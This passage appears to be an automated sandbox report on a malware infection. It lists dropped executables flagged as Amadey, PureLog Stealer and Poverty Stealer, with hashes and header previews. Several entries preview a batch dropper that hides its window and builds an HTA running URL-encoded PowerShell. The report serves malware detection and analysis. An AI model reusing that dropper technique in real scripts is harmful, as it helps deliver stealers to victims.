Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0.................. ........@.. ....................... ......P.....`.................................`...K.......B............................................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.bss................................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439296
Entropy (8bit):	6.489951590243045
Encrypted:	false
SSDEEP:	12288:24RGSlxPlNjb1kaVKfpy4FjMSkhCzL7ARDWb:5lNbKTZMzO4RDY
MD5:	CD0C9B8F92C8BE5F0044145E99E98D43
SHA1:	698637B2A7FD4740A6B96A736B82FFFB0CE67819
SHA-256:	68F60B3ECF60546520E15E442401384703B5436F6F7224BCC6F92B4CA24BABA6
SHA-512:	033B7FFF79F9AF35E92781AAADA06A55619EDDCF7D4BC40FD7EE027627E6AE770F96F2A11148392E64EF2495F30A90DD2486115EF1A7FB1408678FD14E17E5C2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\1032645001\artVssK.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....Uhg............................'.............@..........................0............@..................................E...................................E......8...............................@...............<............................text...j........................... ..`.rdata...H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	7.929390691624792
Encrypted:	false
SSDEEP:	6144:h88f5FvrlHEM9Ysfbaw1fNiN9RHd9wbsbb6TijRGEwLnJwi+Y/ABKiosHp1kl8n/:hPLSnwY9bY8OWFGE6JwK/sesLLA5+
MD5:	4ECED951FE56A908BE8EB3BC95B6A8ED
SHA1:	0B1C1EC501C64F7C1995BDD02AF4BBA6EE6D82B9
SHA-256:	E768C4EBEC903FDF1EB8A9213E9F405755CF69C3901C4B17F3E980296FDB04FA
SHA-512:	603559D7F5342E5E0C2DA222F074DE6B1D8679AA43BEB19F0BBDCA5F7EDC3137B7D0C0DF815720A1B0A2F89DF1C633E1CC4428715CBB5EAEA648BF25EE35CCE8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1032672001\VDoTjfk.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................0.................. ........@.. ...............................@....`.................................`...K.......B............................................................................ ............... ..H............text........ ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B.bss................................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1032884001\D95Ju8g.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1453568
Entropy (8bit):	7.8526825114803005
Encrypted:	false
SSDEEP:	24576:ta85i5KOYJN5R0jf9uRXhsdeL16XRvYDZSD+mRjrIIbofn/Pg9WjO+:Di5IR0f9uGQLYhvAovjrIIQAsh
MD5:	42E93CEDC1BE408F525D5A245527035C
SHA1:	15760ECB3183A058D26C504C4441968EF498001B
SHA-256:	6F70B86B072DEF13AEE42BDABD0DF4F7CC3A2E04EE4A0DFF0C3CEE35CC985D94
SHA-512:	0CBA98CA365811F384BC189A0D56E5DDF8793EA7C77171945D72A0053C2A4345A1F8D6507BF03934F6ED2ACA5D172FFC1DE309E00A953B7547B5C9155229BC4D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.fg.................$...........B... ...`....@.. ....................................`..................................B..K....`............................................................................... ............... ..H............text....#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............,..............@..B.................B......H.......01...Z............................................................(......(.......(.....0.......... ........8........E............q...H...8....~....r...p.....(....o....s......... ....~....{....:....& ....8....~....9.... ....~....{....9....& ....8z...8.... ....~....{....9a...& ....8V....~............j(....r?..p~....o....t.....&~..........~......0..d....... ........8........E....D.......8?........(.....rO..p(....(...+o....& ....~....{....9....& ....8....*&~..

C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	198656
Entropy (8bit):	6.697863110745783
Encrypted:	false
SSDEEP:	3072:2/qTyWF9mcSZfU0V+G0g0XhtmeaIEBkMBqjCF25O58a3E252X25sqw5EwiVqs2L:2iTyWF8Xh+G0g0Lm9suZ8a9w5EwiVqs
MD5:	F85B1133CD60523B8F31E916AFBEA386
SHA1:	DA6B1A5AB89598005A93DAC9B30C543C16F85864
SHA-256:	5D634CB2DD5F02597BA83411554518258AB8ED602CA7263D4F636FA639AB905D
SHA-512:	2E3EDBA0C3941749BC222BBBB2AC5097BCC54EC949B266DE430A1919B9987F51C6EDEFABAB647B5D92ED065DEB0B93487B459532AAA2F5C8A1F5794C5142DD5A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: C:\Users\user\AppData\Local\Temp\1032914001\ZNWzk16.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%\|g..............0.............>.... ... ....@.. .......................`............@.....................................O.... ..&....................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...&.... ......................@..@.reloc.......@......................@..B................ .......H........O..........\...................................................gZ$.....................t.................................................h.`LKA.DBEMBSG.QSFFE@.RO.B?F.KF.pea.GEPO.............h.....Y...Y...Y._.Z$..Y._.Z...Y._.Z%..Y._.Z...Y...Y...Y...Y...Y.\.Z/..Y.\.Z ..Y.\.Z%..Y...Y...Y^\.Z...Y^\.Z...YbKQL...Y........do..h.....8M............................B.......................................d............t.........................$+..\....+..d...................

C:\Users\user\AppData\Local\Temp\1033224001\mQvinTe.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1038693
Entropy (8bit):	7.892980238860217
Encrypted:	false
SSDEEP:	24576:YLA96z4S/zCtTFL/qcF8UReLbpPEwpA0jg8Zg:mA6/EFO+8selrpm
MD5:	89841D2045725C18C80011B9CE901B4E
SHA1:	CB27F6A88454817FB675D1288C0AC455BE1AC42B
SHA-256:	E064EEAB25A47FD1D9B0BF40C8A82254E5F3A5EBB332129F6B91F7E7B6D60A91
SHA-512:	255AA3D8F3AEE82D92B0669D0438A4612FEB48295032C1D97E5FE7A251EDC857C726A4A98ADDF9A69A40192D39DDD335B4F9EB1C6094CF63F456E3E8C512F10C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d......L..........#..........8......d..........@.............................0......7................................................................p.......P..........`Z...........................................................................................text............................... ..`.rdata..lR.......T..................@..@.data..../... ......................@....pdata.......P......................@..@.rsrc........p.......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1033551001\9a8f788f0d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	500224
Entropy (8bit):	6.9993751003868185
Encrypted:	false
SSDEEP:	12288:R3fscf4y94gU6rfENQ9zAsfwlpbjLkV/qXzyi1MR:R30g4y94mr8izAsybPkV6
MD5:	9BF8B21D5ABECC43F525F3A2C8C1E20B
SHA1:	5779681435EE1BCB22C610656E00A06FBF2D353F
SHA-256:	22000D5648CBAADD7B84456DD52F9F57ECB972AC39CB47AAD330E4DE6390B7DA
SHA-512:	5E7AFDC93D2A66A4C8FC671AB3922D18163EE2690EE5828D5C8BA9801E48DF9D1DC32B3BF929BCA57F6A79294DB790FEF8957E2BB43CE5D91E3D678AF3152E74
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{g..............0.............N.... ........@.. ....................................@.....................................W.......6............................................................................ ............... ..H............text...T.... ...................... ..`.rsrc...6...........................@..@.reloc..............................@..B................0.......H...........$.......\...................................................gZ$.....................t.................................................h.`LKA.DBEMBSG.QSFFE@.RO.B?F.KF.pea.GEPO.............h.....Y...Y...Y._.Z$..Y._.Z...Y._.Z%..Y._.Z...Y...Y...Y...Y...Y.\.Z/..Y.\.Z ..Y.\.Z%..Y...Y...Y^\.Z...Y^\.Z...YbKQL...Y........do..h.....9M....................$.......;.......t...........................................t.........................$...8.......d...................

C:\Users\user\AppData\Local\Temp\1033552001\e14357a0aa.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1038693
Entropy (8bit):	7.892980238860217
Encrypted:	false
SSDEEP:	24576:YLA96z4S/zCtTFL/qcF8UReLbpPEwpA0jg8Zg:mA6/EFO+8selrpm
MD5:	89841D2045725C18C80011B9CE901B4E
SHA1:	CB27F6A88454817FB675D1288C0AC455BE1AC42B
SHA-256:	E064EEAB25A47FD1D9B0BF40C8A82254E5F3A5EBB332129F6B91F7E7B6D60A91
SHA-512:	255AA3D8F3AEE82D92B0669D0438A4612FEB48295032C1D97E5FE7A251EDC857C726A4A98ADDF9A69A40192D39DDD335B4F9EB1C6094CF63F456E3E8C512F10C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 11%
Reputation:	unknown
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d......L..........#..........8......d..........@.............................0......7................................................................p.......P..........`Z...........................................................................................text............................... ..`.rdata..lR.......T..................@..@.data..../... ......................@....pdata.......P......................@..@.rsrc........p.......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3231232
Entropy (8bit):	6.649619743882621
Encrypted:	false
SSDEEP:	24576:IAMJ1qRMggfIXIMNVUwPrKIgVNdhQu5gcQh67gK+KNt2V42nZtHiMcECZqcd7S0L:1tmgXImVHzKNHdnSci6792O7qHNTQ+
MD5:	2314D4E1D1134D797121BF79B03C2A4C
SHA1:	DFEA7E36B75FE3DFEA4145D384DD4A0A0875FE5F
SHA-256:	88AE547972DACD7297A5D532B1C68CD2425D71ABFE177F723A6B684A62044D46
SHA-512:	FAFA843B14CEAC72025635D1E8779655B001620E0FCB7732E81CB953B771DF3D071ABB5D0CDE5D4F7B81D165067BDA9D825A0C6EB502191390188CB80FB7256C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1......+2...@.................................W...k............................81..............................81..................................................... . ............................@....rsrc...............................@....idata ............................@...ububvwau..........................@...gjmvneib.....@1......&1.............@....taggant.0...P1.."...,1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
File Type:	ISO-8859 text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.063704561373559
Encrypted:	false
SSDEEP:	48:orouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:o0u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	01F9226489B8CED4578863349788258A
SHA1:	2066AE8743C53EA1CBD7D97DAAC80CEE9C8AE169
SHA-256:	BCAC914F7F69C6FC4F429CE3AD142A5EE8968EA980F563F7C4D1DEE5088994D2
SHA-512:	898ECF3DE00BC23A5CAF2801E2F98A97F91A4FBAC631D4F76D244E4B5F474DA8DA058C66D9A4C07D1B4B6D198FE917284B733F29FB46F1889D8DF4F0F1260098
Malicious:	false
Reputation:	unknown
Preview:	@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%7

C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
File Type:	ISO-8859 text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.063704561373559
Encrypted:	false
SSDEEP:	48:orouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:o0u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	01F9226489B8CED4578863349788258A
SHA1:	2066AE8743C53EA1CBD7D97DAAC80CEE9C8AE169
SHA-256:	BCAC914F7F69C6FC4F429CE3AD142A5EE8968EA980F563F7C4D1DEE5088994D2
SHA-512:	898ECF3DE00BC23A5CAF2801E2F98A97F91A4FBAC631D4F76D244E4B5F474DA8DA058C66D9A4C07D1B4B6D198FE917284B733F29FB46F1889D8DF4F0F1260098
Malicious:	true
Reputation:	unknown
Preview:	@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%7

C:\Users\user\AppData\Local\Temp\A6C3.tmp\A6C4.tmp\A6C5.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
File Type:	ISO-8859 text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.063704561373559
Encrypted:	false
SSDEEP:	48:orouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:o0u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	01F9226489B8CED4578863349788258A
SHA1:	2066AE8743C53EA1CBD7D97DAAC80CEE9C8AE169
SHA-256:	BCAC914F7F69C6FC4F429CE3AD142A5EE8968EA980F563F7C4D1DEE5088994D2
SHA-512:	898ECF3DE00BC23A5CAF2801E2F98A97F91A4FBAC631D4F76D244E4B5F474DA8DA058C66D9A4C07D1B4B6D198FE917284B733F29FB46F1889D8DF4F0F1260098
Malicious:	false
Reputation:	unknown
Preview:	@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%7

C:\Users\user\AppData\Local\Temp\A859.tmp\A85A.tmp\A85B.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
File Type:	ISO-8859 text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.063704561373559
Encrypted:	false
SSDEEP:	48:orouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:o0u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	01F9226489B8CED4578863349788258A
SHA1:	2066AE8743C53EA1CBD7D97DAAC80CEE9C8AE169
SHA-256:	BCAC914F7F69C6FC4F429CE3AD142A5EE8968EA980F563F7C4D1DEE5088994D2
SHA-512:	898ECF3DE00BC23A5CAF2801E2F98A97F91A4FBAC631D4F76D244E4B5F474DA8DA058C66D9A4C07D1B4B6D198FE917284B733F29FB46F1889D8DF4F0F1260098
Malicious:	false
Reputation:	unknown
Preview:	@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%7

C:\Users\user\AppData\Local\Temp\E870.tmp\E871.tmp\E881.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
File Type:	ISO-8859 text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.063704561373559
Encrypted:	false
SSDEEP:	48:orouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:o0u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	01F9226489B8CED4578863349788258A
SHA1:	2066AE8743C53EA1CBD7D97DAAC80CEE9C8AE169
SHA-256:	BCAC914F7F69C6FC4F429CE3AD142A5EE8968EA980F563F7C4D1DEE5088994D2
SHA-512:	898ECF3DE00BC23A5CAF2801E2F98A97F91A4FBAC631D4F76D244E4B5F474DA8DA058C66D9A4C07D1B4B6D198FE917284B733F29FB46F1889D8DF4F0F1260098
Malicious:	false
Reputation:	unknown
Preview:	@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%7

C:\Users\user\AppData\Local\Temp\E9E7.tmp\E9E8.tmp\E9E9.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
File Type:	ISO-8859 text, with very long lines (798), with CRLF line terminators
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	5.063704561373559
Encrypted:	false
SSDEEP:	48:orouU8rgHHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQa0:o0u+GurX16HA3Ux6D9Dw1fQGObEQa0
MD5:	01F9226489B8CED4578863349788258A
SHA1:	2066AE8743C53EA1CBD7D97DAAC80CEE9C8AE169
SHA-256:	BCAC914F7F69C6FC4F429CE3AD142A5EE8968EA980F563F7C4D1DEE5088994D2
SHA-512:	898ECF3DE00BC23A5CAF2801E2F98A97F91A4FBAC631D4F76D244E4B5F474DA8DA058C66D9A4C07D1B4B6D198FE917284B733F29FB46F1889D8DF4F0F1260098
Malicious:	false
Reputation:	unknown
Preview:	@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. timeout /t 2 >nul.. if not exist "%filePath%" exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%7

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ty1nwkq.jcy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c2t5vjt.lol.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajuxsdcs.zrc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjuxtsqm.kpz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsg0lkfv.h2i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bt0iemys.5og.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
